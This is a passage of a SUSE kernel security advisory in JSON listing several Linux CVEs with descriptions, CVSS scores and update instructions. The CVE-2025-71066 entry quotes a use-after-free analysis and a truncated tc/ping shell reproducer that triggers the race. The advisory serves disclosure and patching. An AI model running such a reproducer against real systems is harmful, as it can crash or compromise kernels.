"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68815"
},
{
"cve": "CVE-2025-68816",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68816"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: fw_tracer, Validate format string parameters\n\nAdd validation for format string parameters in the firmware tracer to\nprevent potential security vulnerabilities and crashes from malformed\nformat strings received from firmware.\n\nThe firmware tracer receives format strings from the device firmware and\nuses them to format trace messages. Without proper validation, bad\nfirmware could provide format strings with invalid format specifiers\n(e.g., %s, %p, %n) that could lead to crashes, or other undefined\nbehavior.\n\nAdd mlx5_tracer_validate_params() to validate that all format specifiers\nin trace strings are limited to safe integer/hex formats (%x, %d, %i,\n%u, %llx, %lx, etc.). Reject strings containing other format types that\ncould be used to access arbitrary memory or cause crashes.\nInvalid format strings are added to the trace output for visibility with\n\"BAD_FORMAT: \" prefix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68816",
"url": "https://www.suse.com/security/cve/CVE-2025-68816"
},
{
"category": "external",
"summary": "SUSE Bug 1256674 for CVE-2025-68816",
"url": "https://bugzilla.suse.com/1256674"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68816"
},
{
"cve": "CVE-2025-68819",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68819"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-usb: dtv5100: fix out-of-bounds in dtv5100_i2c_msg()\n\nrlen value is a user-controlled value, but dtv5100_i2c_msg() does not\ncheck the size of the rlen value. Therefore, if it is set to a value\nlarger than sizeof(st-\u003edata), an out-of-bounds vuln occurs for st-\u003edata.\n\nTherefore, we need to add proper range checking to prevent this vuln.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68819",
"url": "https://www.suse.com/security/cve/CVE-2025-68819"
},
{
"category": "external",
"summary": "SUSE Bug 1256664 for CVE-2025-68819",
"url": "https://bugzilla.suse.com/1256664"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68819"
},
{
"cve": "CVE-2025-68820",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68820"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: xattr: fix null pointer deref in ext4_raw_inode()\n\nIf ext4_get_inode_loc() fails (e.g. if it returns -EFSCORRUPTED),\niloc.bh will remain set to NULL. Since ext4_xattr_inode_dec_ref_all()\nlacks error checking, this will lead to a null pointer dereference\nin ext4_raw_inode(), called right after ext4_get_inode_loc().\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68820",
"url": "https://www.suse.com/security/cve/CVE-2025-68820"
},
{
"category": "external",
"summary": "SUSE Bug 1256754 for CVE-2025-68820",
"url": "https://bugzilla.suse.com/1256754"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68820"
},
{
"cve": "CVE-2025-71064",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71064"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: using the num_tqps in the vf driver to apply for resources\n\nCurrently, hdev-\u003ehtqp is allocated using hdev-\u003enum_tqps, and kinfo-\u003etqp\nis allocated using kinfo-\u003enum_tqps. However, kinfo-\u003enum_tqps is set to\nmin(new_tqps, hdev-\u003enum_tqps); Therefore, kinfo-\u003enum_tqps may be smaller\nthan hdev-\u003enum_tqps, which causes some hdev-\u003ehtqp[i] to remain\nuninitialized in hclgevf_knic_setup().\n\nThus, this patch allocates hdev-\u003ehtqp and kinfo-\u003etqp using hdev-\u003enum_tqps,\nensuring that the lengths of hdev-\u003ehtqp and kinfo-\u003etqp are consistent\nand that all elements are properly initialized.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71064",
"url": "https://www.suse.com/security/cve/CVE-2025-71064"
},
{
"category": "external",
"summary": "SUSE Bug 1256654 for CVE-2025-71064",
"url": "https://bugzilla.suse.com/1256654"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-71064"
},
{
"cve": "CVE-2025-71066",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71066"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Always remove class from active list before deleting in ets_qdisc_change\n\nzdi-disclosures@trendmicro.com says:\n\nThe vulnerability is a race condition between `ets_qdisc_dequeue` and\n`ets_qdisc_change`. It leads to UAF on `struct Qdisc` object.\nAttacker requires the capability to create new user and network namespace\nin order to trigger the bug.\nSee my additional commentary at the end of the analysis.\n\nAnalysis:\n\nstatic int ets_qdisc_change(struct Qdisc *sch, struct nlattr *opt,\n struct netlink_ext_ack *extack)\n{\n...\n\n // (1) this lock is preventing .change handler (`ets_qdisc_change`)\n //to race with .dequeue handler (`ets_qdisc_dequeue`)\n sch_tree_lock(sch);\n\n for (i = nbands; i \u003c oldbands; i++) {\n if (i \u003e= q-\u003enstrict \u0026\u0026 q-\u003eclasses[i].qdisc-\u003eq.qlen)\n list_del_init(\u0026q-\u003eclasses[i].alist);\n qdisc_purge_queue(q-\u003eclasses[i].qdisc);\n }\n\n WRITE_ONCE(q-\u003enbands, nbands);\n for (i = nstrict; i \u003c q-\u003enstrict; i++) {\n if (q-\u003eclasses[i].qdisc-\u003eq.qlen) {\n\t\t // (2) the class is added to the q-\u003eactive\n list_add_tail(\u0026q-\u003eclasses[i].alist, \u0026q-\u003eactive);\n q-\u003eclasses[i].deficit = quanta[i];\n }\n }\n WRITE_ONCE(q-\u003enstrict, nstrict);\n memcpy(q-\u003eprio2band, priomap, sizeof(priomap));\n\n for (i = 0; i \u003c q-\u003enbands; i++)\n WRITE_ONCE(q-\u003eclasses[i].quantum, quanta[i]);\n\n for (i = oldbands; i \u003c q-\u003enbands; i++) {\n q-\u003eclasses[i].qdisc = queues[i];\n if (q-\u003eclasses[i].qdisc != \u0026noop_qdisc)\n qdisc_hash_add(q-\u003eclasses[i].qdisc, true);\n }\n\n // (3) the qdisc is unlocked, now dequeue can be called in parallel\n // to the rest of .change handler\n sch_tree_unlock(sch);\n\n ets_offload_change(sch);\n for (i = q-\u003enbands; i \u003c oldbands; i++) {\n\t // (4) we\u0027re reducing the refcount for our class\u0027s qdisc and\n\t // freeing it\n qdisc_put(q-\u003eclasses[i].qdisc);\n\t // (5) If we call .dequeue between (4) and (5), we will have\n\t // a strong UAF and we can control RIP\n q-\u003eclasses[i].qdisc = NULL;\n WRITE_ONCE(q-\u003eclasses[i].quantum, 0);\n q-\u003eclasses[i].deficit = 0;\n gnet_stats_basic_sync_init(\u0026q-\u003eclasses[i].bstats);\n memset(\u0026q-\u003eclasses[i].qstats, 0, sizeof(q-\u003eclasses[i].qstats));\n }\n return 0;\n}\n\nComment:\nThis happens because some of the classes have their qdiscs assigned to\nNULL, but remain in the active list. This commit fixes this issue by always\nremoving the class from the active list before deleting and freeing its\nassociated qdisc\n\nReproducer Steps\n(trimmed version of what was sent by zdi-disclosures@trendmicro.com)\n\n```\nDEV=\"${DEV:-lo}\"\nROOT_HANDLE=\"${ROOT_HANDLE:-1:}\"\nBAND2_HANDLE=\"${BAND2_HANDLE:-20:}\" # child under 1:2\nPING_BYTES=\"${PING_BYTES:-48}\"\nPING_COUNT=\"${PING_COUNT:-200000}\"\nPING_DST=\"${PING_DST:-127.0.0.1}\"\n\nSLOW_TBF_RATE=\"${SLOW_TBF_RATE:-8bit}\"\nSLOW_TBF_BURST=\"${SLOW_TBF_BURST:-100b}\"\nSLOW_TBF_LAT=\"${SLOW_TBF_LAT:-1s}\"\n\ncleanup() {\n tc qdisc del dev \"$DEV\" root 2\u003e/dev/null\n}\ntrap cleanup EXIT\n\nip link set \"$DEV\" up\n\ntc qdisc del dev \"$DEV\" root 2\u003e/dev/null || true\n\ntc qdisc add dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\n\ntc qdisc add dev \"$DEV\" parent 1:2 handle \"$BAND2_HANDLE\" \\\n tbf rate \"$SLOW_TBF_RATE\" burst \"$SLOW_TBF_BURST\" latency \"$SLOW_TBF_LAT\"\n\ntc filter add dev \"$DEV\" parent 1: protocol all prio 1 u32 match u32 0 0 flowid 1:2\ntc -s qdisc ls dev $DEV\n\nping -I \"$DEV\" -f -c \"$PING_COUNT\" -s \"$PING_BYTES\" -W 0.001 \"$PING_DST\" \\\n \u003e/dev/null 2\u003e\u00261 \u0026\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 0\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\ntc -s qdisc ls dev $DEV\ntc qdisc del dev \"$DEV\" parent \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71066",
"url": "https://www.suse.com/security/cve/CVE-2025-71066"
},
{
"category": "external",
"summary": "SUSE Bug 1256645 for CVE-2025-71066",
"url": "https://bugzilla.suse.com/1256645"
},
{
"category": "external",
"summary": "SUSE Bug 1258005 for CVE-2025-71066",
"url": "https://bugzilla.suse.com/1258005"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "important"
}
],
"title": "CVE-2025-71066"
},
{
"cve": "CVE-2025-71076",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71076"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/oa: Limit num_syncs to prevent oversized allocations\n\nThe OA open parameters did not validate num_syncs, allowing\nuserspace to pass arbitrarily large values, potentially\nleading to excessive allocations.\n\nAdd check to ensure that num_syncs does not exceed DRM_XE_MAX_SYNCS,\nreturning -EINVAL when the limit is violated.\n\nv2: use XE_IOCTL_DBG() and drop duplicated check. (Ashutosh)\n\n(cherry picked from commit e057b2d2b8d815df3858a87dffafa2af37e5945b)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
